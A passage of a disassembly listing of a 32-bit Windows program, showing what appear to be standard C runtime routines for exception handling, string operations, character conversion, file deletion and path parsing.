sub_415643 endp
; ---------------------------------------------------------------------------
loc_415695: ; CODE XREF: .text:0041FBA2�j
push ebp
mov ebp, esp
sub esp, 4
push ebx
push esi
push edi
cld
mov [ebp-4], eax
xor eax, eax
push eax
push eax
push eax
push dword ptr [ebp-4]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_41A9CD
add esp, 20h
mov [ebp-4], eax
pop edi
pop esi
pop ebx
mov eax, [ebp-4]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4156CB: ; DATA XREF: sub_41586F+17�o
cld
mov eax, [esp+8]
push 0
push eax
push dword ptr [eax+10h]
push dword ptr [eax+8]
push 0
push dword ptr [esp+20h]
push dword ptr [eax+0Ch]
push dword ptr [esp+20h]
call sub_41A9CD
add esp, 20h
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4156EF proc near ; DATA XREF: sub_4158C0+B�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
cld
mov eax, [ebp+arg_0]
mov eax, [eax+4]
and eax, 66h
test eax, eax
jz short loc_415710
mov eax, [ebp+arg_4]
mov dword ptr [eax+24h], 1
xor eax, eax
inc eax
jmp short loc_41575D
; ---------------------------------------------------------------------------
loc_415710: ; CODE XREF: sub_4156EF+10�j
push 1
mov eax, [ebp+arg_4]
push dword ptr [eax+14h]
mov eax, [ebp+arg_4]
push dword ptr [eax+10h]
mov eax, [ebp+arg_4]
push dword ptr [eax+8]
push 0
push [ebp+arg_8]
mov eax, [ebp+arg_4]
push dword ptr [eax+0Ch]
push [ebp+arg_0]
call sub_41A9CD
add esp, 20h
mov eax, [ebp+arg_4]
cmp dword ptr [eax+24h], 0
jnz short loc_41574E
push [ebp+arg_0]
push [ebp+arg_4]
call sub_415643
loc_41574E: ; CODE XREF: sub_4156EF+52�j
mov ebx, [ebp+arg_4]
mov esp, [ebx+1Ch]
mov ebp, [ebx+20h]
jmp dword ptr [ebx+18h]
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
loc_41575D: ; CODE XREF: sub_4156EF+1F�j
pop ebx
pop ebp
retn
sub_4156EF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415760 proc near ; CODE XREF: sub_41A72B+52�p
; sub_41A7EB+E2�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_4], 0
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
mov esi, [edi+0Ch]
mov ebx, [edi+10h]
mov eax, esi
mov [ebp+var_4], eax
mov [ebp+arg_0], esi
jl short loc_4157B6
loc_41577E: ; CODE XREF: sub_415760+51�j
cmp esi, 0FFFFFFFFh
jnz short loc_415788
call sub_41AAA4
loc_415788: ; CODE XREF: sub_415760+21�j
mov ecx, [ebp+arg_8]
dec esi
lea eax, [esi+esi*4]
lea eax, [ebx+eax*4]
cmp [eax+4], ecx
jge short loc_41579C
cmp ecx, [eax+8]
jle short loc_4157A1
loc_41579C: ; CODE XREF: sub_415760+35�j
cmp esi, 0FFFFFFFFh
jnz short loc_4157AD
loc_4157A1: ; CODE XREF: sub_415760+3A�j
mov eax, [ebp+arg_0]
dec [ebp+arg_4]
mov [ebp+var_4], eax
mov [ebp+arg_0], esi
loc_4157AD: ; CODE XREF: sub_415760+3F�j
cmp [ebp+arg_4], 0
jge short loc_41577E
mov eax, [ebp+var_4]
loc_4157B6: ; CODE XREF: sub_415760+1C�j
mov ecx, [ebp+arg_C]
inc esi
mov [ecx], esi
mov ecx, [ebp+arg_10]
mov [ecx], eax
cmp eax, [edi+0Ch]
ja short loc_4157CA
cmp esi, eax
jbe short loc_4157CF
loc_4157CA: ; CODE XREF: sub_415760+64�j
call sub_41AAA4
loc_4157CF: ; CODE XREF: sub_415760+68�j
pop edi
lea eax, [esi+esi*4]
pop esi
lea eax, [ebx+eax*4]
pop ebx
leave
retn
sub_415760 endp
; =============== S U B R O U T I N E =======================================
sub_4157DA proc near ; CODE XREF: sub_41A3A1+28�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push esi
mov esi, [esp+4+arg_0]
mov [esi], eax
call sub_416E15
mov eax, [eax+84h]
mov [esi+4], eax
call sub_416E15
mov [eax+84h], esi
mov eax, esi
pop esi
retn
sub_4157DA endp
; =============== S U B R O U T I N E =======================================
sub_415802 proc near ; CODE XREF: sub_41A4E4+4B�p
arg_0 = dword ptr 4
call sub_416E15
mov eax, [eax+84h]
jmp short loc_41581A
; ---------------------------------------------------------------------------
loc_41580F: ; CODE XREF: sub_415802+1A�j
mov ecx, [eax]
cmp ecx, [esp+arg_0]
jz short loc_415820
mov eax, [eax+4]
loc_41581A: ; CODE XREF: sub_415802+B�j
test eax, eax
jnz short loc_41580F
inc eax
retn
; ---------------------------------------------------------------------------
loc_415820: ; CODE XREF: sub_415802+13�j
xor eax, eax
retn
sub_415802 endp
; =============== S U B R O U T I N E =======================================
sub_415823 proc near ; CODE XREF: sub_41A4E4+9�p
arg_0 = dword ptr 4
push esi
call sub_416E15
mov esi, [esp+4+arg_0]
cmp esi, [eax+84h]
jnz short loc_415845
call sub_416E15
mov ecx, [esi+4]
mov [eax+84h], ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_415845: ; CODE XREF: sub_415823+10�j
call sub_416E15
mov eax, [eax+84h]
jmp short loc_41585B
; ---------------------------------------------------------------------------
loc_415852: ; CODE XREF: sub_415823+3C�j
mov ecx, [eax+4]
cmp esi, ecx
jz short loc_415867
mov eax, ecx
loc_41585B: ; CODE XREF: sub_415823+2D�j
cmp dword ptr [eax+4], 0
jnz short loc_415852
pop esi
jmp sub_41AAA4
; ---------------------------------------------------------------------------
loc_415867: ; CODE XREF: sub_415823+34�j
mov ecx, [esi+4]
mov [eax+4], ecx
pop esi
retn
sub_415823 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41586F proc near ; CODE XREF: sub_41A3A1+71�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 14h
mov eax, [ebp+arg_4]
and [ebp+var_14], 0
mov ecx, [ebp+arg_0]
mov [ebp+var_C], eax
mov eax, [ebp+arg_C]
inc eax
mov [ebp+var_10], offset loc_4156CB
mov [ebp+var_8], ecx
mov [ebp+var_4], eax
mov eax, large fs:0
mov [ebp+var_14], eax
lea eax, [ebp+var_14]
mov large fs:0, eax
push [ebp+arg_10]
push ecx
push [ebp+arg_8]
call sub_41AAE0
mov ecx, eax
mov eax, [ebp+var_14]
mov large fs:0, eax
mov eax, ecx
leave
retn
sub_41586F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4158C0 proc near ; CODE XREF: sub_41A72B+33�p
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 34h
push ebx
and [ebp+var_28], 0
mov [ebp+var_24], offset sub_4156EF
mov eax, [ebp+arg_10]
mov [ebp+var_20], eax
mov eax, [ebp+arg_4]
mov [ebp+var_1C], eax
mov eax, [ebp+arg_14]
mov [ebp+var_18], eax
mov eax, [ebp+arg_18]
mov [ebp+var_14], eax
and [ebp+var_10], 0
and [ebp+var_C], 0
and [ebp+var_8], 0
and [ebp+var_4], 0
mov [ebp+var_10], offset loc_415943
mov [ebp+var_C], esp
mov [ebp+var_8], ebp
mov eax, large fs:0
mov [ebp+var_28], eax
lea eax, [ebp+var_28]
mov large fs:0, eax
mov [ebp+var_34], 1
mov eax, [ebp+arg_0]
mov [ebp+var_30], eax
mov eax, [ebp+arg_8]
mov [ebp+var_2C], eax
lea eax, [ebp+var_30]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax]
call sub_416E15
call dword ptr [eax+74h]
pop ecx
pop ecx
and [ebp+var_34], 0
loc_415943: ; DATA XREF: sub_4158C0+3A�o
cmp [ebp+var_4], 0
jz short loc_415960
mov ebx, large fs:0
mov eax, [ebx]
mov ebx, [ebp+var_28]
mov [ebx], eax
mov large fs:0, ebx
jmp short loc_415969
; ---------------------------------------------------------------------------
loc_415960: ; CODE XREF: sub_4158C0+87�j
mov eax, [ebp+var_28]
mov large fs:0, eax
loc_415969: ; CODE XREF: sub_4158C0+9E�j
mov eax, [ebp+var_34]
pop ebx
leave
retn
sub_4158C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415970 proc near ; CODE XREF: sub_41D0A0+5A�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset loc_415988
push [ebp+arg_0]
call sub_41F5A6 ; RtlUnwind
loc_415988: ; DATA XREF: sub_415970+B�o
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_415970 endp
; =============== S U B R O U T I N E =======================================
sub_415990 proc near ; DATA XREF: sub_4159B2+A�o
; sub_415A1A+9�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_C = dword ptr 10h
mov ecx, [esp+arg_0]
test dword ptr [ecx+4], 6
mov eax, 1
jz short locret_4159B1
mov eax, [esp+arg_4]
mov edx, [esp+arg_C]
mov [edx], eax
mov eax, 3
locret_4159B1: ; CODE XREF: sub_415990+10�j
retn
sub_415990 endp
; =============== S U B R O U T I N E =======================================
sub_4159B2 proc near ; CODE XREF: sub_41D0A0+67�p
; sub_41D0A0+A7�p ...
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push offset sub_415990
push large dword ptr fs:0
mov large fs:0, esp
loc_4159CF: ; CODE XREF: sub_4159B2:loc_415A0A�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_415A0C
cmp esi, [esp+1Ch+arg_4]
jz short loc_415A0C
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov [esp+1Ch+var_14], ecx
mov [eax+0Ch], ecx
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_415A0A
push 101h
mov eax, [ebx+esi*4+8]
call sub_415A46
call dword ptr [ebx+esi*4+8]
loc_415A0A: ; CODE XREF: sub_4159B2+44�j
jmp short loc_4159CF
; ---------------------------------------------------------------------------
loc_415A0C: ; CODE XREF: sub_4159B2+2A�j
; sub_4159B2+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_4159B2 endp
; =============== S U B R O U T I N E =======================================
sub_415A1A proc near ; CODE XREF: sub_41A4E4+55�p
xor eax, eax
mov ecx, large fs:0
cmp dword ptr [ecx+4], offset sub_415990
jnz short locret_415A3C
mov edx, [ecx+0Ch]
mov edx, [edx+0Ch]
cmp [ecx+8], edx
jnz short locret_415A3C
mov eax, 1
locret_415A3C: ; CODE XREF: sub_415A1A+10�j
; sub_415A1A+1B�j
retn
sub_415A1A endp
; =============== S U B R O U T I N E =======================================
sub_415A3D proc near ; CODE XREF: sub_41AAE0+1E�p
; sub_41AAE0+40�p
push ebx
push ecx
mov ebx, offset dword_42D7B0
jmp short loc_415A50
sub_415A3D endp
; =============== S U B R O U T I N E =======================================
sub_415A46 proc near ; CODE XREF: sub_4159B2+4F�p
; sub_41D0A0+78�p
push ebx
push ecx
mov ebx, offset dword_42D7B0
mov ecx, [ebp+8]
loc_415A50: ; CODE XREF: sub_415A3D+7�j
mov [ebx+8], ecx
mov [ebx+4], eax
mov [ebx+0Ch], ebp
pop ecx
pop ebx
retn 4
sub_415A46 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_415A60 proc near ; CODE XREF: sub_407064+5�p
push 0FFFFFFFFh
push eax
mov eax, large fs:0
push eax
mov eax, [esp+0Ch]
mov large fs:0, esp
mov [esp+0Ch], ebp
lea ebp, [esp+0Ch]
push eax
retn
sub_415A60 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_415A90
loc_415A80: ; CODE XREF: sub_415A90+1F�j
lea eax, [edx-1]
pop ebx
retn
; END OF FUNCTION CHUNK FOR sub_415A90
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_415A90 proc near ; CODE XREF: sub_4070E5+21�p
; sub_407820+32�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
; FUNCTION CHUNK AT 00415A80 SIZE 00000005 BYTES
xor eax, eax
mov al, [esp+arg_4]
loc_415A96: ; CODE XREF: sub_4150B0+74�j
push ebx
mov ebx, eax
shl eax, 8
mov edx, [esp+4+arg_0]
test edx, 3
jz short loc_415ABD
loc_415AA8: ; CODE XREF: sub_415A90+2B�j
mov cl, [edx]
add edx, 1
cmp cl, bl
jz short loc_415A80
test cl, cl
jz short loc_415B06
test edx, 3
jnz short loc_415AA8
loc_415ABD: ; CODE XREF: sub_415A90+16�j
or ebx, eax
push edi
mov eax, ebx
shl ebx, 10h
push esi
or ebx, eax
loc_415AC8: ; CODE XREF: sub_415A90+63�j
; sub_415A90+72�j ...
mov ecx, [edx]
mov edi, 7EFEFEFFh
mov eax, ecx
mov esi, edi
xor ecx, ebx
add esi, eax
add edi, ecx
xor ecx, 0FFFFFFFFh
xor eax, 0FFFFFFFFh
xor ecx, edi
xor eax, esi
add edx, 4
and ecx, 81010100h
jnz short loc_415B0A
and eax, 81010100h
jz short loc_415AC8
and eax, 1010100h
jnz short loc_415B04
and esi, 80000000h
jnz short loc_415AC8
loc_415B04: ; CODE XREF: sub_415A90+6A�j
; sub_415A90+83�j ...
pop esi
pop edi
loc_415B06: ; CODE XREF: sub_415A90+23�j
pop ebx
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_415B0A: ; CODE XREF: sub_415A90+5C�j
mov eax, [edx-4]
cmp al, bl
jz short loc_415B47
test al, al
jz short loc_415B04
cmp ah, bl
jz short loc_415B40
test ah, ah
jz short loc_415B04
shr eax, 10h
cmp al, bl
jz short loc_415B39
test al, al
jz short loc_415B04
cmp ah, bl
jz short loc_415B32
test ah, ah
jz short loc_415B04
jmp short loc_415AC8
; ---------------------------------------------------------------------------
loc_415B32: ; CODE XREF: sub_415A90+9A�j
pop esi
pop edi
lea eax, [edx-1]
pop ebx
retn
; ---------------------------------------------------------------------------
loc_415B39: ; CODE XREF: sub_415A90+92�j
lea eax, [edx-2]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_415B40: ; CODE XREF: sub_415A90+87�j
lea eax, [edx-3]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_415B47: ; CODE XREF: sub_415A90+7F�j
lea eax, [edx-4]
pop esi
pop edi
pop ebx
retn
sub_415A90 endp
; =============== S U B R O U T I N E =======================================
sub_415B4E proc near ; CODE XREF: sub_4076EC+55�p
; sub_40FF1B+239�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
loc_415B52: ; CODE XREF: sub_415B4E+C�j
mov cx, [eax]
inc eax
inc eax
test cx, cx
jnz short loc_415B52
sub eax, [esp+arg_0]
sar eax, 1
dec eax
retn
sub_415B4E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415B64 proc near ; CODE XREF: sub_415C5A+22�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
mov edx, [ebp+arg_4]
push ebx
push esi
xor esi, esi
xor eax, eax
cmp edx, esi
push edi
jz loc_415C2B
mov ebx, [ebp+arg_C]
cmp ebx, esi
jz loc_415C55
mov edi, [ebp+arg_0]
cmp [edi+14h], esi
jnz short loc_415BB6
cmp ebx, esi
jbe loc_415C55
loc_415B95: ; CODE XREF: sub_415B64+4B�j
mov ecx, [ebp+arg_8]
add ecx, eax
movzx si, byte ptr [ecx]
mov [edx], si
cmp byte ptr [ecx], 0
jz loc_415C55
inc eax
inc edx
inc edx
cmp eax, ebx
jb short loc_415B95
jmp loc_415C55
; ---------------------------------------------------------------------------
loc_415BB6: ; CODE XREF: sub_415B64+27�j
mov esi, ds:dword_4200D4
push ebx
mov ebx, [ebp+arg_8]
push edx
push 0FFFFFFFFh
push ebx
push 9
push dword ptr [edi+4]
call esi ; MultiByteToWideChar
test eax, eax
jnz loc_415C54
call ds:dword_420008 ; RtlGetLastWin32Error
cmp eax, 7Ah
jz short loc_415BEE
loc_415BDE: ; CODE XREF: sub_415B64+C5�j
; sub_415B64+EE�j
call sub_419600
mov dword ptr [eax], 2Ah
or eax, 0FFFFFFFFh
jmp short loc_415C55
; ---------------------------------------------------------------------------
loc_415BEE: ; CODE XREF: sub_415B64+78�j
mov eax, [ebp+arg_C]
mov [ebp+var_4], eax
mov eax, ebx
loc_415BF6: ; CODE XREF: sub_415B64+AE�j
mov cl, [eax]
dec [ebp+var_4]
test cl, cl
jz short loc_415C14
mov edx, [edi+48h]
movzx ecx, cl
test byte ptr [edx+ecx*2+1], 80h
jz short loc_415C0D
inc eax
loc_415C0D: ; CODE XREF: sub_415B64+A6�j
inc eax
cmp [ebp+var_4], 0
jnz short loc_415BF6
loc_415C14: ; CODE XREF: sub_415B64+99�j
push [ebp+arg_C]
sub eax, ebx
push [ebp+arg_4]
push eax
push ebx
push 1
push dword ptr [edi+4]
call esi ; MultiByteToWideChar
test eax, eax
jnz short loc_415C55
jmp short loc_415BDE
; ---------------------------------------------------------------------------
loc_415C2B: ; CODE XREF: sub_415B64+10�j
mov eax, [ebp+arg_0]
cmp [eax+14h], esi
jnz short loc_415C3E
push [ebp+arg_8]
call sub_4179C0
pop ecx
jmp short loc_415C55
; ---------------------------------------------------------------------------
loc_415C3E: ; CODE XREF: sub_415B64+CD�j
push esi
push esi
push 0FFFFFFFFh
push [ebp+arg_8]
push 9
push dword ptr [eax+4]
call ds:dword_4200D4 ; MultiByteToWideChar
cmp eax, esi
jz short loc_415BDE
loc_415C54: ; CODE XREF: sub_415B64+69�j
dec eax
loc_415C55: ; CODE XREF: sub_415B64+1B�j
; sub_415B64+2B�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_415B64 endp
; =============== S U B R O U T I N E =======================================
sub_415C5A proc near ; CODE XREF: sub_4076EC+19�p
; sub_4076EC+49�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
call sub_416E15
mov eax, [eax+64h]
cmp eax, off_42D83C
jz short loc_415C6F
call sub_417C4E
loc_415C6F: ; CODE XREF: sub_415C5A+E�j
push [esp+arg_8]
push [esp+4+arg_4]
push [esp+8+arg_0]
push eax
call sub_415B64
add esp, 10h
retn
sub_415C5A endp
; =============== S U B R O U T I N E =======================================
sub_415C85 proc near ; CODE XREF: sub_408A18+51DE�p
arg_0 = dword ptr 4
push [esp+arg_0]
call ds:dword_4200E4 ; DeleteFileA
test eax, eax
jnz short loc_415C9B
call ds:dword_420008 ; RtlGetLastWin32Error
jmp short loc_415C9D
; ---------------------------------------------------------------------------
loc_415C9B: ; CODE XREF: sub_415C85+C�j
xor eax, eax
loc_415C9D: ; CODE XREF: sub_415C85+14�j
test eax, eax
jz short loc_415CAC
push eax
call sub_419612
pop ecx
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_415CAC: ; CODE XREF: sub_415C85+1A�j
xor eax, eax
retn
sub_415C85 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415CAF proc near ; CODE XREF: sub_408A18+5148�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push 14h
push offset stru_428DA8
call __SEH_prolog
mov esi, [ebp+arg_0]
mov [ebp+var_1C], esi
push esi
call sub_417FF8
pop ecx
and [ebp+ms_exc.disabled], 0
push esi
call sub_41AB2C
mov [ebp+var_20], eax
lea eax, [ebp+arg_8]
push eax
push [ebp+arg_4]
push esi
call sub_416662
mov [ebp+var_24], eax
push esi
push [ebp+var_20]
call sub_41ABB4
add esp, 18h
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_415D03
mov eax, [ebp+var_24]
call __SEH_epilog
retn
sub_415CAF endp
; =============== S U B R O U T I N E =======================================
sub_415D03 proc near ; CODE XREF: sub_415CAF+46�p
; DATA XREF: .rdata:stru_428DA8�o
push dword ptr [ebp-1Ch]
call sub_41804A
pop ecx
retn
sub_415D03 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415D0D proc near ; CODE XREF: sub_408A18+4352�p
; sub_40E745+F6�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_4], 0
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
push ebx
call sub_4179C0
cmp eax, 1
pop ecx
jb short loc_415D49
cmp byte ptr [ebx+1], 3Ah
jnz short loc_415D49
mov esi, [ebp+arg_4]
test esi, esi
jz short loc_415D45
push 2
push ebx
push esi
call sub_41B13B
add esp, 0Ch
and byte ptr [esi+2], 0
loc_415D45: ; CODE XREF: sub_415D0D+26�j
inc ebx
inc ebx
jmp short loc_415D53
; ---------------------------------------------------------------------------
loc_415D49: ; CODE XREF: sub_415D0D+19�j
; sub_415D0D+1F�j
mov eax, [ebp+arg_4]
test eax, eax
jz short loc_415D53
and byte ptr [eax], 0
loc_415D53: ; CODE XREF: sub_415D0D+3A�j
; sub_415D0D+41�j
and [ebp+arg_0], 0
cmp byte ptr [ebx], 0
mov eax, ebx
mov [ebp+var_8], eax
mov esi, 0FFh
jz short loc_415DCB
loc_415D66: ; CODE XREF: sub_415D0D+88�j
mov cl, [eax]
movzx edx, cl
test byte_47C741[edx], 4
jz short loc_415D77
inc eax
jmp short loc_415D91
; ---------------------------------------------------------------------------
loc_415D77: ; CODE XREF: sub_415D0D+65�j
cmp cl, 2Fh
jz short loc_415D8B
cmp cl, 5Ch
jz short loc_415D8B
cmp cl, 2Eh
jnz short loc_415D91
mov [ebp+var_4], eax
jmp short loc_415D91
; ---------------------------------------------------------------------------
loc_415D8B: ; CODE XREF: sub_415D0D+6D�j
; sub_415D0D+72�j
lea ecx, [eax+1]
mov [ebp+arg_0], ecx
loc_415D91: ; CODE XREF: sub_415D0D+68�j
; sub_415D0D+77�j ...
inc eax
cmp byte ptr [eax], 0
jnz short loc_415D66
mov edi, [ebp+arg_0]
test edi, edi
mov [ebp+var_8], eax
jz short loc_415DCB
cmp [ebp+arg_8], 0
jz short loc_415DC6
sub edi, ebx
cmp edi, esi
jb short loc_415DAF
mov edi, esi
loc_415DAF: ; CODE XREF: sub_415D0D+9E�j
push edi
push ebx
push [ebp+arg_8]
call sub_41B13B
mov eax, [ebp+arg_8]
add esp, 0Ch
and byte ptr [edi+eax], 0
mov eax, [ebp+var_8]
loc_415DC6: ; CODE XREF: sub_415D0D+98�j
mov ebx, [ebp+arg_0]
jmp short loc_415DD5
; ---------------------------------------------------------------------------
loc_415DCB: ; CODE XREF: sub_415D0D+57�j
; sub_415D0D+92�j
mov ecx, [ebp+arg_8]
test ecx, ecx
jz short loc_415DD5
and byte ptr [ecx], 0
loc_415DD5: ; CODE XREF: sub_415D0D+BC�j
; sub_415D0D+C3�j
mov edi, [ebp+var_4]
test edi, edi
jz short loc_415E28
cmp edi, ebx
jb short loc_415E28
cmp [ebp+arg_C], 0
jz short loc_415E05
sub edi, ebx
cmp edi, esi
jb short loc_415DEE
mov edi, esi
loc_415DEE: ; CODE XREF: sub_415D0D+DD�j
push edi
push ebx
push [ebp+arg_C]
call sub_41B13B
mov eax, [ebp+arg_C]
add esp, 0Ch
and byte ptr [edi+eax], 0
mov eax, [ebp+var_8]
loc_415E05: ; CODE XREF: sub_415D0D+D7�j
mov edi, [ebp+arg_10]
test edi, edi
jz short loc_415E50
sub eax, [ebp+var_4]
cmp eax, esi
jnb short loc_415E15
mov esi, eax
loc_415E15: ; CODE XREF: sub_415D0D+104�j
push esi
push [ebp+var_4]
push edi
call sub_41B13B
add esp, 0Ch
and byte ptr [esi+edi], 0
jmp short loc_415E50
; ---------------------------------------------------------------------------
loc_415E28: ; CODE XREF: sub_415D0D+CD�j
; sub_415D0D+D1�j
mov edi, [ebp+arg_C]
test edi, edi
jz short loc_415E46
sub eax, ebx
cmp eax, esi
jnb short loc_415E37
mov esi, eax
loc_415E37: ; CODE XREF: sub_415D0D+126�j
push esi
push ebx
push edi
call sub_41B13B
add esp, 0Ch
and byte ptr [esi+edi], 0
loc_415E46: ; CODE XREF: sub_415D0D+120�j
mov eax, [ebp+arg_10]
test eax, eax
jz short loc_415E50
and byte ptr [eax], 0
loc_415E50: ; CODE XREF: sub_415D0D+FD�j
; sub_415D0D+119�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_415D0D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415E55 proc near ; CODE XREF: sub_408A18+37D3�p
; sub_408A18+3800�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push 18h
push offset stru_428DB8
call __SEH_prolog
mov ebx, [ebp+arg_0]
mov edi, ebx
mov [ebp+var_1C], ebx
cmp [ebp+arg_4], 0
jg short loc_415E73
xor eax, eax
jmp short loc_415ECA
; ---------------------------------------------------------------------------
loc_415E73: ; CODE XREF: sub_415E55+18�j
mov esi, [ebp+arg_8]
mov [ebp+var_20], esi
push esi
call sub_417FF8
pop ecx
and [ebp+ms_exc.disabled], 0
loc_415E84: ; CODE XREF: sub_415E55+64�j
dec [ebp+arg_4]
jz short loc_415EBB
dec dword ptr [esi+4]
js short loc_415E98
mov ecx, [esi]
movzx eax, byte ptr [ecx]
inc ecx
mov [esi], ecx
jmp short loc_415E9F
; ---------------------------------------------------------------------------
loc_415E98: ; CODE XREF: sub_415E55+37�j
push esi
call sub_418DD9
pop ecx
loc_415E9F: ; CODE XREF: sub_415E55+41�j
mov [ebp+var_24], eax
cmp eax, 0FFFFFFFFh
jnz short loc_415EB1
cmp edi, ebx
jnz short loc_415EBB
and [ebp+var_1C], 0
jmp short loc_415EBE
; ---------------------------------------------------------------------------
loc_415EB1: ; CODE XREF: sub_415E55+50�j
mov [edi], al
inc edi
mov [ebp+var_28], edi
cmp al, 0Ah
jnz short loc_415E84
loc_415EBB: ; CODE XREF: sub_415E55+32�j
; sub_415E55+54�j
and byte ptr [edi], 0
loc_415EBE: ; CODE XREF: sub_415E55+5A�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_415ED3
mov eax, [ebp+var_1C]
loc_415ECA: ; CODE XREF: sub_415E55+1C�j
call __SEH_epilog
retn
sub_415E55 endp
; =============== S U B R O U T I N E =======================================
sub_415ED0 proc near ; DATA XREF: .rdata:stru_428DB8�o
mov esi, [ebp-20h]
sub_415ED0 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_415ED3 proc near ; CODE XREF: sub_415E55+6D�p
push esi
call sub_41804A
pop ecx
retn
sub_415ED3 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415EE0 proc near ; CODE XREF: sub_408A18+8D4�p
; sub_411FA9+285�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov ecx, [ebp+arg_8]
jecxz short loc_415F12
mov ebx, ecx
mov edi, [ebp+arg_0]
mov esi, edi
xor eax, eax
repne scasb
neg ecx
add ecx, ebx
mov edi, esi
mov esi, [ebp+arg_4]
repe cmpsb
mov al, [esi-1]
xor ecx, ecx
cmp al, [edi-1]
ja short loc_415F10
jz short loc_415F12
sub ecx, 2
loc_415F10: ; CODE XREF: sub_415EE0+29�j
not ecx
loc_415F12: ; CODE XREF: sub_415EE0+9�j
; sub_415EE0+2B�j
mov eax, ecx
pop ebx
pop esi
pop edi
leave
retn
sub_415EE0 endp
; =============== S U B R O U T I N E =======================================
sub_415F19 proc near ; CODE XREF: sub_415FC0+CB�p
; sub_4162C5+1C�p
arg_0 = dword ptr 4
push offset aMscoree_dll ; "mscoree.dll"
call ds:dword_4200A4 ; GetModuleHandleA
test eax, eax
